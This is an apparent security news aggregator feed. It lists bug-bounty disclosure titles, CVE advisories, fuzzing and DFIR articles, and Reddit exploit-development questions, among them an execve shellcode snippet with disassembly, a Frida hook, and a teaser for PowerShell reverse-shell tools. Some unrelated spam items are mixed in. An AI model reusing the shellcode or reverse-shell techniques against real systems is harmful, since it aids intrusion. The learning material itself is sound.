    TikTok disclosed a bug submitted by semsem123: https://hackerone.com/reports/1394440 - Bounty: $1000
    IDOR the ability to view support tickets of any user on seller platform
    TikTok disclosed a bug submitted by lewaperbb: https://hackerone.com/reports/1392630 - Bounty: $2500
    [h1-2102] [Yaworski's Broskis] Suspected overcharge and chargebacks in PoS
    Shopify disclosed a bug submitted by c0rv4x: https://hackerone.com/reports/1089978 - Bounty: $500
    access to stack memory beyond array boundaries
    Open-Xchange disclosed a bug submitted by ihsinme: https://hackerone.com/reports/796555 - Bounty: $400
    File System Monitoring Queue Overflow
    ownCloud disclosed a bug submitted by ihsinme: https://hackerone.com/reports/881891
    Ability to add address without being an admin or staff in the store via wholesale store
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1279322 - Bounty: $500
    Unauthorised access to admin endpoint on plus-website-staging5.shopifycloud.com
    Shopify disclosed a bug submitted by j0j0: https://hackerone.com/reports/1394982 - Bounty: $2900
  • Open

    Dynamic instrumentation of a C binary
    I am (a Frida noob) trying to write a script for Frida to capture and modify variables inside a C function. The code for my binary looks like this:
        int myfunc(int dummy) { return --dummy; }
        int main () {
            ...
            printf("%d\n", myfunc(15));
            return 0;
        }
    My javascript looks like this:
        var myfunc_ptr = Module.findExportByName(null, "myfunc")
        Interceptor.attach(myfunc_ptr, {
            onEnter: function(args) {
                const source_string = args[0].readUtf8String();
                console.log(source_string);
                args[0].writeUtf8String("999");
            },
            onLeave: function(retval) {
                // by now do nothing.
            }
        })
    But it fails to update the value. Any help is appreciated! :) submitted by /u/www_devharsh_me [link] [comments]  ( 1 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    XMGoat - An Open Source Pentesting Tool for Azure - XM Cyber
    submitted by /u/dmchell

  • Open

    Stored XSS in files.slack.com
    Slack disclosed a bug submitted by oskarsv: https://hackerone.com/reports/827606 - Bounty: $1000
    Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints
    Shopify disclosed a bug submitted by cthulhufhtagn: https://hackerone.com/reports/1115139 - Bounty: $500
    CSS injection via link tag whitelisted-domain bypass - https://www.glassdoor.com
    Glassdoor disclosed a bug submitted by zonduu: https://hackerone.com/reports/1250730 - Bounty: $100
    account takeover through password reset in url https://reklama.tochka.com/
    QIWI disclosed a bug submitted by anonymouus: https://hackerone.com/reports/1379842 - Bounty: $500
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F
  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo.
  • Open

    APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus
    A persistent and determined APT actor has expanded beyond Zoho ManageEngine ADSelfService Plus and begun an active campaign against ServiceDesk Plus. The post APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus appeared first on Unit42.

  • Open

    Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
    submitted by /u/dmchell
    Tracking a P2P network related to TA505
    submitted by /u/dmchell
  • Open

    [Security Advisory] Multiple high-severity vulnerabilities in HP multifunction printers (CVE-2021-3923...
    Recently, details of multiple high-severity vulnerabilities in HP multifunction printers (CVE-2021-39237 & CVE-2021-39238) were made public; HP had released a security advisory on November 1. Attackers can exploit these vulnerabilities to obtain sensitive information and perform remote...
  • Open

    Faster Chrome - Let The Compiler do the work
    Chrome is fast, but there's always room for improvement. Often, that's achieved by carefully crafting the algorithms that make up Chrome. But there's a lot of Chrome, so why not let computers do at least some part of our work? In this installment of The Fast And the Curious, we'll show you several changes in how we build Chrome to achieve a 25.8% higher score on Speedometer on Windows and a 22.0% increase in browser responsiveness. Why speed? So why do we care about performance benchmarks? It's not a simple "higher numbers is better" chasing of achievements - performance was so important to Chrome that we embedded in our core principles, the "4Ss" - Speed, Security, Stability, Simplicity. And speed matters because we want a browser that responds quickly. Speed matters so much because we…
  • Open

    Welley Christ is trending as the world’s perfect man and he needs a deal for a record label and…
    Making millions have been a problem for Welley Christ he needs a record label viral topic about Welley Christ trending topic about Welley…
  • Open

    Is passing data to a driver a collection of loads/Mov instructions?
    submitted by /u/WillyRaezer
    Android touch input spoofing?
    How could I spoof the input to the touch screen on any app using regular code and not already root? submitted by /u/WillyRaezer
  • Open

    Play Your Cards Right: Detecting Wildcard DNS Abuse
    Wildcard DNS records can be used constructively, but their flexibility also provides attackers with a variety of options for executing attacks. The post Play Your Cards Right: Detecting Wildcard DNS Abuse appeared first on Unit42.
  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10.
  • Open

    Privilege Escalation leads to trash other users comment without having admin rights.
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1307943 - Bounty: $200
    Stored XSS on https://community.my.games/ (Add Post)
    Mail.ru disclosed a bug submitted by c1kada: https://hackerone.com/reports/755322
    Reflected XSS in photogallery component on [https://market.av.ru]
    Azbuka Vkusa disclosed a bug submitted by haxta4ok00: https://hackerone.com/reports/988271 - Bounty: $100
    .....
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/505336 - Bounty: $200

  • Open

    CVE-2021-22205 GitLab RCE: In-depth Analysis of the Unauthenticated Access (Part 1)
    View the original on the official account. Preface: On April 7, security researcher vakzz submitted an RCE vulnerability in GitLab on HackerOne; at the time it was not stated whether exploitation required logging in to GitLab. On October 25, a foreign security company discovered unauthenticated in-the-wild exploitation of the vulnerability through log analysis and found a new exploitation method. According to the official vulnerability advisory page, the safe versions are 13.10.3, 13.9.6 and 13.8.8. I will analyze in depth, across several parts, how the vulnerability arises and how it is triggered and exploited. This part reproduces and analyzes how a request carrying a malicious file is passed through GitLab to exiftool for parsing; the next part will analyze the principle of the exiftool vulnerability and the final trigger and exploitation. I expect two or three parts in total. I hope readers gain something from them and form their own unique insights. In writing this article I would like to thank @chybeta and @rebirthwyw and the masters in my team for their help; their articles and guidance gave me many good ideas. GitLab introduction: GitLab is a web-based Git repository management tool developed by GitLab Inc. under the MIT license, with wiki and issue tracking features. It uses Git as its code management tool and is a web service built on top of it. GitLab was developed by Ukrainian programmers Dmitriy Zaporozhets and Valery Sizov. The back-end framework is Ruby on Rails, written in Ruby; later some parts were rewritten in Go. gitlab-ce is the free Community Edition and gitlab-ee is the paid Enterprise Edition. Below are two single-node GitLab deployment architecture diagrams introducing the corresponding components. As you can see, GitLab is made up of various components and can be reached through two key entry points: HTTP/HTTPS (TCP 80, 443) and SSH (TCP 22). Requests are forwarded by nginx to Workhorse, and Workhorse then interacts with Puma. Here we focus on GitLab Workhorse, the component accessed via the web. …

  • Open

    [Security Advisory] 泛微 E-Office file upload vulnerability (CNVD-2021-49104)
    Recently, in-the-wild exploitation of the 泛微 E-Office file upload vulnerability (CNVD-2021-49104) has appeared online; an attacker can use the vulnerability to, on affected...
  • Open

    Paid CTF partner
    Hi, I'm doing a couple of CTFs next Sunday and Monday, and I have a shortage in the Pwn and reverse fields. If you're interested in helping me through the CTF in these challenges and earning some quick money for each one you help solve, let me know or message me. Note: I can cover all other categories, and know the basics of pwn and reverse, but I don't have a team, that's why I'm asking for help. And as I know everyone is busy working or studying, I offered money for each challenge solved so it doesn't become a waste of time for whoever wants to help. submitted by /u/riskyg33k
  • Open

    AbuseHumanDB — HackTheBox Write-Up
    In the first post of this blog we will examine a Hack The Box challenge called “AbuseHumanDB” and how to perform a Blind XS Leak + CORS…

  • Open

    Execve shellcode not working
        global _start
        start:
        ; =================== EXECVE ======================
        ; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md
        xor eax, eax
        mov al, 11          ; execve sys call no 11
        xor edx, edx
        ; reverse the command string and store it /bin/bash/0
        push edx            ; push the null of the string
        push 0x686c6c61     ; this shit represent ls -allh in reverse and converted to hex
        push 0x2d20736c
        mov ebx, esp        ; sec arg to the execve is the pointer to the string to execve
        mov ecx, edx        ; mov 3rd arg to execve can be null
        int 0x80
        ;================= EXIT PROGRAM =====================
        ; exit = sys call no 1 -> must go to eax
        ; args to sys call is return code of the program -> must go to ebx
        ;xor eax, eax        ; eax = 0
        ;add eax, 1          ; eax = 1
        ;xor ebx, ebx        ; ebx = 0
        ;add bl, 4
        ;inc ebx
        ;int 0x80

    See the push edx and the next 2 instructions: it's the command ls -allh. This command isn't executing, but /bin//sh is working with this. Is there any problem with this? Running a program: sh is a program too and it's working, but not ls with args.

    ;;;;;; after compiling and dumping with objdump ;;;;;;;;;

        ld: warning: cannot find entry symbol _start; defaulting to 0000000008049000
        f_output: file format elf32-i386
        Disassembly of section .text:
        08049000 :
        8049000: 31 c0          xor eax,eax
        8049002: b0 0b          mov al,0xb
        8049004: 31 d2          xor edx,edx
        8049006: 52             push edx
        8049007: 68 61 6c 6c 68 push 0x686c6c61
        804900c: 68 6c 73 20 2d push 0x2d20736c
        8049011: 89 e3          mov ebx,esp
        8049013: 89 d1          mov ecx,edx
        8049015: cd 80          int 0x80

    submitted by /u/dude_sourav
  • Open

    Threat Hunting, IRL
    While I worked for one company, I did a lot of public speaking on the value of threat hunting. During these events, I met a lot of folks who were interested to learn what "threat hunting" was, and how it could be of value to them. I live in a very rural area, on just shy of 19 acres. One neighbor has 15 acres up front and another 20 in the back, and he adjoins a large property with just a trailer. My neighbor on the other side has 19 acres of...just 19 acres. We have animals, as well as more than a few visitors, which makes for a great analogy for threat hunting. Within the borders of my property, we have three horses and a mini-donkey, and we have different paddocks and fields for them. We can restrict them to certain areas, or allow them to roam freely. We do this at different times o…

  • Open

    New differential fuzzing tool reveals novel HTTP request smuggling techniques
    Article URL: https://portswigger.net/daily-swig/new-differential-fuzzing-tool-reveals-novel-http-request-smuggling-techniques Comments URL: https://news.ycombinator.com/item?id=29342944 Points: 169 # Comments: 33

  • Open

    Long names and muscle memory?
    Hi, I have a general programming question. I have a tendency to like short and sweet code, but many platforms/libraries have more obtuse names etc. Is it common to build muscle memory when typing out longer names etc.? I noticed Windows land code is pretty obtuse. submitted by /u/WillyRaezer
  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle.
  • Open

    [Translation] Some BPF datapath extensions for K8s workloads (LPC, 2021)
    Translator's preface: This article is a translation of an LPC 2021 talk: BPF datapath extensions for K8s workloads. The authors, Daniel Borkmann and Martynas Pumputis, are both core Cilium developers. Some background knowledge, code snippets and links have been added in translation to aid understanding. The translation is published with the authors' permission. Given the translator's limited ability, omissions and errors are inevitable; if in doubt, consult the original. The translation follows. Translator's preface 0 Introduction 0.1 Cilium datapath basics 0.2 Several new changes in the Cilium datapath 0.3 Outline of this article 1 cgroup v1/v2 interference problem 1.1 Ordinary nodes: mounting v1/v2 simultaneously is fine 1.2 Nested-virtualization nodes 1.2.1 KIND (K8s-In-Docker) 1.2.2 KIND worker node cgroup layout 1.2.3 Resulting problems 1.3 Analysis: legacy code assumed v1/v2 would never be enabled at the same time 1.4 Solution: split the v1/v2 fields 2 TCP Pacing 2.0 Basics 2.0.1 TCP Pacing (sending data evenly within each RTT window) 2.0.2 The TCP BBR algorithm 2.0.3 tc FQ (Fair Queue) 2.1 K8s pod rate limiting 2.2 Implementation of pod egress rate limiting in Cilium 2.3 Next steps: supporting TCP Pacing & BBR 2.3.1 Why it cannot be supported yet: crossing netns resets the skb timestamp 2.3.2 Why skb->tstamp is reset when crossing netns 2.3.3 Can skb->tstamp be unified to a single clock? 2.4 Mid-session Q&A Question 1: net_t…

  • Open

    Tips for DFIR Analysts, pt. V
    Over the years, I've seen DFIR referred to in terms of special operations forces. I've seen incident response teams referred to as "Cyber SEALs", as well as via various other terms. However, when you really look at it, incident response is much more akin to the US Army Special Forces, aka "Green Berets"; you have to "parachute in" to a foreign environment, and quickly develop a response capability making use of the customer's staff ("the natives"), all of whom live in a "foreign culture". As such, IR is less about "direct action" and "hostage rescue", and more about "foreign internal defense". Analysis occurs when an analyst applies their knowledge and experience to data, and is usually predicated by a parsing phase. We can learn a great deal about the analyst's level of knowledge and experie…
  • Open

    Fuzzing with Scapy: Introduction to Network Protocol Fuzzing (DNS & TCP packets)
    submitted by /u/pat_ventuzelo

  • Open

    Observing Attacks Against Hundreds of Exposed Services in Public Clouds
    Insecurely exposed services are common misconfigurations in cloud environments. We used a honeypot infrastructure to learn about attacks against them. The post Observing Attacks Against Hundreds of Exposed Services in Public Clouds appeared first on Unit42.
  • Open

    Explaining Basic DOM Clobbering And The Tag
    Or if you’re stuck on PortSwigger’s DOM Clobbering labs
    Intigriti’s November XSS challenge By @IvarsVids
    This one is by far one of the hardest challenges that I’ve done. The solution is not as intended but it does include some pretty nice…
  • Open

    Source code audit or methodology to find potential Memory corruption in low level language in c/c++ and Assembly.
    Hi, I am a beginner in vulnerability research. I have some experience in CTF and exploit challenges. The problem I am facing is that I struggle while auditing code, either in C/C++ or assembly, manually. I miss many points while searching for potential candidates for memory corruption or other logical vulnerabilities. Let’s say I am analysing a C++ developed binary in IDA. So I want some advice, or any tutorials or books, to achieve that. Also, in WinDbg let’s say a crash has happened. How do I determine which class of vulnerability it is? Please let me know, guys. Thanks. submitted by /u/crypt3r

  • Open

    The "serial offender" #sexually assaulted an innocent minor girl and fled the scene.
    #Sexually assaulted an innocent minor #girl

  • Open

    A bit confused about the jmpcall function in PEDA w/ ASLR but no PIE (x64/Linux)
    Brushing up on some x64 exploitation, and going through some exercises, I am confused by this: When I find jmp esp in a non-PIE enabled binary (using gdb-peda), the location does not seem to change, and is only 3 bytes (with ASLR on). This works fine to execute my shellcode if I pad it out with nulls. What I am confused about is, why is it only 3 bytes? And why is it constant? Is ASLR only randomizing buffer space and not where the .code is loaded? Is an ASLR enabled binary in Windows then the equivalent of Linux ASLR + PIE? Are the 3 bytes just a relative offset?

        gdb-peda$ jmp esp
        0x40061e : jmp rsp
        0x400743 : call rsp
        0x60061e : jmp rsp
        0x600743 : call rsp

    submitted by /u/Bahariasaurus
  • Open

    [Security Advisory] Metabase sensitive information disclosure vulnerability (CVE-2021-41277)
    Recently, a sensitive information disclosure vulnerability was disclosed in Metabase, with a CVSS3 score as high as 9.9. An attacker can obtain sensitive system information without authentication.

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows.
  • Open

    Exploiting Predictable PRNG Seeds (with PwnTools, incl binary patching)
    submitted by /u/_CryptoCat23
  • Open

    [Translation] [Paper] Formal requirements for virtualizable third generation (computer) architectures (ACM, 1974)
    Translator's preface: This article is a translation of the classic 1974 paper on virtualizable computer architectures (i.e., architectures able to support VMs): Popek, Gerald J., and Robert P. Goldberg. "Formal requirements for virtualizable third generation architectures." Communications of the ACM 17.7 (1974): 412-421. Although half a century old, some of the paper's core ideas are still not outdated. In particular, it explains at the most basic level how virtual machines work (much as (Translation) RFC 1180: A TCP/IP Tutorial (1991) explains at the most basic level how TCP/IP works, although this paper is somewhat more obscure), which helps greatly in understanding the underlying principles of virtualization. For an introduction to first- through fourth-generation computer architectures, see Evolution of Computers from First Generation to Fourth Generation: first generation: 1940 – 1958; second generation: 1958 – 1964; third generation: 1964 ~ 1974, characterized by integrated circuits replacing transistors, high-level programming languages, and magnetic storage; fourth generation: 1974 ~ present. Given the translator's limited ability, omissions and errors are inevitable; if in doubt, consult the original. The translation follows. Translator's preface 1. Virtual Machine Concepts 1.1 Virtual machines (VMs) and virtual machine monitors (VMMs) 1.2 Properties of a VMM 1.2.1 Equivalence: a program executing in the VM produces the same result as on the real machine 1.2.2 Efficiency: most VM instructions execute directly on the hardware 1.2.3 Complete control of system resources 1.3 Definition of a virtual machine (VM) 2. A Model of Third Generation M…

  • Open

    Simplified Storage Controls
    Posted by Theodore Olsauskas-Warren At Chrome, we’re always looking for ways to help users better understand and manage privacy on the web. Our most recent change provides more clarity on controlling site storage settings. Starting today, we will be rolling out this change to M97 Beta, we will be re-configuring our Privacy and Security settings related to data a site can store (e.g. cookies). Users can now delete all data stored by an individual site by navigating to Settings > Privacy and Security > Site Settings > View permissions and data stored across files, where they’ll land on chrome://settings/content/all. We will be removing the more granular controls found when navigating to Settings > Privacy and Security > Cookies and other site data > See all cookies and site data at chrome:/…
    Chrome 97: WebTransport, New Array Static Methods and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links. Chrome 97 is beta as of November 18, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. For more information, see Force Chrome major version to 100 in the User-Agent string. Features in this Release Auto-expand D…
  • Open

    security researcher assistant
    Hello folks, I am looking for an internship in exploit dev or vulnerability research. I am not looking for any revenue, I just need practical experience. Is there a way to find an internship in such a field as a non-American? submitted by /u/botta633
    Is it still worth it to read The Shellcoder’s Handbook?
    I've been meaning to get into exploit dev and I know that The Shellcoder’s Handbook is recommended, but does it still hold up in 2021? submitted by /u/milkshakemahn

  • Open

    Threat actors offer millions for zero-days, developers talk of exploit-as-a-service
    submitted by /u/soupcreamychicken
  • Open

    [Security Advisory] Apache ShenYu Admin authentication bypass vulnerability (CVE-2...
    Recently, an authentication bypass vulnerability was disclosed in Apache ShenYu Admin; an attacker can use it to bypass JSON Web Token (JWT) authentication and go straight into the system backend.
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam

  • Open

    [Security Advisory] Hadoop Yarn RPC service unauthorized access vulnerability
    Recently, in-the-wild exploitation of an unauthorized access vulnerability in the Hadoop Yarn RPC service has appeared online; an attacker can use it to execute arbitrary commands on affected hosts without authentication.
  • Open

    How to generate millions of files using grammar-based fuzzing (FormatFuzzer)
    submitted by /u/pat_ventuzelo
  • Open

    Partitioning Chrome's Code for Faster Launch Times on Android
    Mobile devices are generally more resource constrained than laptops or desktops. Optimizing Chrome’s resource usage is critical to give mobile users a faster Chrome experience. As we’ve added features to Chrome on Android, the amount of Java code packaged in the app has continued to grow. In this The Fast and the Curious post we show how our team improved the speed and memory usage of Chrome on Android with Isolated Splits. With these improvements, Chrome on Android now uses 5-7% less memory, and starts and loads pages even faster than before. The Problem For Android apps (including Chrome on Android), compiled Java code is stored in .dex files. The user's experience in Chrome on Android is particularly sensitive to increases in .dex size due to its multi-process architecture. On Android,…
  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments.

  • Open

    Show HN: OpenAPI fuzzer – fuzzing APIs based on OpenAPI specification
    Article URL: https://github.com/matusf/openapi-fuzzer Comments URL: https://news.ycombinator.com/item?id=29231804 Points: 76 # Comments: 22
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges for a long period. One of…

  • Open

    picoCTF - Here's a Libc Writeup
    submitted by /u/YioUio

  • Open

    Breaking into exploit dev
    I am a security engineer looking to break into exploit dev. Background: I do not have a CS degree, although I went to school for CS. While in school I was captain of our collegiate hacking team. I held sessions where we practiced (beginner) buffer overflows. While in school I had done research on hardware reverse engineering, focused on medical devices. That got me to present with my peers at our local bsides. I then was able to present at IEEE southeastcon, which got me a job as a security engineer before graduating. 1) Is it possible to get into exploit dev without a degree or is it absolutely necessary? 2) Should I go the pentester route and then exploit dev? 3) Do you see security engineers break into this field or does it tend to be developers? I don't do any software engineering, but I do a lot of tooling in powershell, python, and recently, go. I know C but hardly. 4) Should I just shaddup and start learning? I'd assume that's getting a better grip on primitives, ROP and C. submitted by /u/xnrkl
    Binary Exploitation (Pwn) Challenge Walkthroughs - HackTheBox x Synack #RedTeamFive CTF
    submitted by /u/_CryptoCat23
  • Open

    Fuzzware: Using Precise MMIO Modeling for Effective Firmware Fuzzing – Usenix
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/scharnowski Comments URL: https://news.ycombinator.com/item?id=29198875 Points: 2 # Comments: 0

  • Open

    ClusterFuzzLite: Continuous Fuzzing for All
    Article URL: https://security.googleblog.com/2021/11/clusterfuzzlite-continuous-fuzzing-for.html Comments URL: https://news.ycombinator.com/item?id=29188664 Points: 15 # Comments: 3
  • Open

    [Security Advisory] PAN GlobalProtect Portal memory corruption vulnerability (CVE-...
    Recently, Palo Alto Networks (PAN) released a security advisory fixing a memory corruption vulnerability in the Palo Alto Networks GlobalProtect portal and gateway interfaces. Unauthenticated attack...

  • Open

    Asking Github Copilot to write Fuzzers & Hacking code for me - Hacking with AI
    submitted by /u/pat_ventuzelo

  • Open

    Nyx-Net: Network Fuzzing with Incremental Snapshots
    Article URL: https://arxiv.org/abs/2111.03013 Comments URL: https://news.ycombinator.com/item?id=29116464 Points: 2 # Comments: 0

  • Open

    Chrome Dev Summit 2021: Moving toward a more powerful and private web
    By Paul Kinlan, Lead for Chrome Developer Relations The big day is finally here. Today, at Chrome Dev Summit 2021 we shared some of the highlights of what we've been working on — the latest product updates, vision for the web's future and examples of best-in-class web experiences. Over the past year, we've also had a lot of feedback that you want to spend more time learning from and working with the Chrome team and other industry experts. I'm excited to share with you that we've opened up a lot of spaces for 1:1 office hours, workshops and learning lounges to give you more opportunity to connect with the Chrome team. It's been a busy year for us all and with the continued shift of people moving more of their lives online, it has been more important than ever for us to continue investing …

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.
  • Open

    Run on OS Login
    Users want frequently used applications such as Email, Chat, and other productivity apps to automatically start when they log in to their devices. Auto-starting these apps at login streamlines the user experience as users don't have to manually start apps after logging into their devices. Windows, Mac, and Linux devices allow users to configure native apps to be launched automatically on startup. In Chrome 91, we introduced the Run on OS Login feature. With the launch of this feature, users can now configure desktop web apps to launch automatically when they log-in to the device on Windows, Mac, and Linux devices. Installed apps will not be permitted to automatically enable themselves to run when the user logs in. A manual user gesture will always be required. To configure apps to run on OS login, open Chrome browser. Navigate to chrome://apps or click the ‘Apps' icon in your bookmark bar (example below). To configure an app to start at login, first right click on it. From the context menu, select ‘Start app when you sign in' and you are all set. Next time when you log in to your device, the app will automatically launch on its own. To disable this feature for an app, navigate to chrome://apps. Right click on the app to bring up the context menu and deselect the option, ‘Start app when you sign in'. Apps launched through Run on OS Login are launched only after the device is running. ‘Run on OS Login' is a browser only feature and doesn't expose any launch source information to app developers. We're continuously improving the web platform to provide safe, low friction ways for users to get their day-to-day tasks done. Support for running installed web apps on OS login is a small but significant step to simplifying the startup routine for users that want apps like chat, email, or calendar clients to start as soon as they turn on their computer. As always, we're looking forward to your feedback. Your input will help us prioritize next steps! 
Posted by Pratyush Sinha

  • Open

    Searching, browsing, and shutdown Chrome performance improvements
    Chrome has long-term investments in performance improvement across many projects and we are pleased to share improvements across speed, memory, and unexpected hangs in today’s The Fast and the Curious series post. One in six searches is now as fast as a blink of an eye, Chrome OS browsing now uses up to 20% less memory thanks to our PartitionAlloc investment, and we’ve resolved some thorny Chrome OS and Windows shutdown experiences. Omnibox You’ve probably noticed that potential queries are suggested to you as you type when you’re searching the web using Chrome’s omnibox (as long as the “Autocomplete searches and URLs” feature is turned on in Chrome settings.) This makes searching for information faster and easier, as you don’t have to type in the entire search query -- once you’ve entered…
  • Open

    Tips for DFIR Analysts, pt IV
    Context is king, it makes all the difference. You may see something run in EDR telemetry, or in logs, but the context of when it ran in relation to other activities is often critical. Did it occur immediately following a system reboot or a user login? Does it occur repeatedly? Does it occur on other systems? Did it occur in rapid succession with other commands, indicating that perhaps it was scripted? The how and when of the context then leads to attribution. Andy Piazza brings the same thoughts to CTI in his article, "CTI is Better Served with Context". Automation can be a wonderful thing, if you use it, and use it to your advantage. The bad guys do it all the time. Automation means you don't have to remember steps (because you will forget), and it drives consistency and efficiency. Even …

  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the

  • Open

    Autofuzz – Fuzzing Java Without Writing Fuzz Targets
    Article URL: https://fuzz.ci/jazzer/update/2.0 Comments URL: https://news.ycombinator.com/item?id=29013958 Points: 3 # Comments: 1

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.

    In-depth analysis of a format string remote code execution vulnerability in the mpv player (CVE-2021-30145)
    1. Background: mpv is an open-source project that runs on multiple systems, including Windows, Linux and macOS, and is a popular video player. mpv has a format string vulnerability when reading the file name, which can lead to a heap overflow and arbitrary code execution. 2. Environment setup: The system environment is Ubuntu x64; the software environment can be set up in two ways. 1. Build from source; the source is at https://github.com/mpv-player/mpv/tree/v0.33.0 and the download address is https://github.com/mpv-player/mpv/archive/refs/tags/v0.33.0.zip. 2. Install the package directly; the installed build has no symbols, which makes debugging inconvenient. The software can be installed with the following three commands: sudo add-apt-repository ppa:mc3man/mpv-tests sudo apt-get update sudo apt-get install mpv (see https://blog.csdn.net/qq_34626094/article/details/113122032). After installation, running the software looks as follows: 3. Reproducing the vulnerability. Source code: line 154 of demux_mf.c calls sprintf. sprintf is a format string function: parameter 1 is the destination buffer, parameter 2 is the format string, and parameter 2 is attacker-controllable; the third parameter is the loop counter. mpv itself supports passing a single % in the file name, so %d can be used to print this loop counter, but because the validation is lax, it checks neither other format specifiers nor the number of % characters, so a format string vulnerability exists: line 127 of demux_mf.c checks whether a % is present, but does not check how many % there are or what parameters follow the %. The program has a format string vulnerability; run it with the following command: ./mpv …

    An Intro to Fuzzing (a.k.a. Fuzz Testing)
    Article URL: https://labs.bishopfox.com/tech-blog/an-intro-to-fuzzing-aka-fuzz-testing Comments URL: https://news.ycombinator.com/item?id=28988478 Points: 4 # Comments: 0  ( 14 min )

    Security Fuzzing Podcast Episode
    Article URL: https://anchor.fm/firo-solutions/episodes/Fuzzing-with-Patrick-Ventuzelo-e197t6c Comments URL: https://news.ycombinator.com/item?id=28977322 Points: 4 # Comments: 0  ( 23 min )

    Chrome 96 Beta: Conditional Focus, Priority Hints, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 96 is beta as of October 21, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. Origin Trials This version of Chrome introduces the origin trials described below. Origin…
    Sunsetting the "basic-card" payment method in the Payment Request API
    The Payment Request API is a soon-to-be-recommended web standard that aims to make building low-friction and secure payment flows easier for developers. The browser facilitates the flow between a merchant website and "payment handlers". A payment handler can be built into the browser, a native app installed on a user's mobile device, or a Progressive Web App. Today, developers can use the Payment Request API to access several payment methods, including "basic-card" and Google Pay in Chrome on most platforms, Apple Pay in Safari, Digital Goods API on Google Play, and Secure Payment Confirmation in Chrome. Earlier last year, we announced that we will deprecate the "basic-card" payment handler on iOS Chrome, followed by other platforms in the future. The "basic-card" is a payment method that is typically built into the browser to help users easily enter credit card numbers without remembering and typing them. This was designed to make a good transition from a form based credit card payment to an app based tokenized card payment. In order to better pursue the goal of app based payment (and a few other reasons), the Web Payments WG decided to remove it from the specification. Starting from version 96, Chrome will show a warning message in the DevTools Console (together with creating a report to the Reporting API) when the "basic-card" payment method is used. In version 100, the "basic-card" payment method will no longer be available and canMakePayment() will return false unless other capable payment methods are specified. This applies to all platforms including Android, macOS, Windows, Linux, and Chrome OS. If you are using the Payment Request API with the "basic-card" payment handler, we suggest removing it as soon as possible and using an alternative payment method such as Google Pay or Samsung Pay. Posted by Eiji Kitamura, Developer Advocate on the Chrome team

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )

    [Translation] How NAT traversal works: technical principles and enterprise-grade practice (Tailscale, 2020)
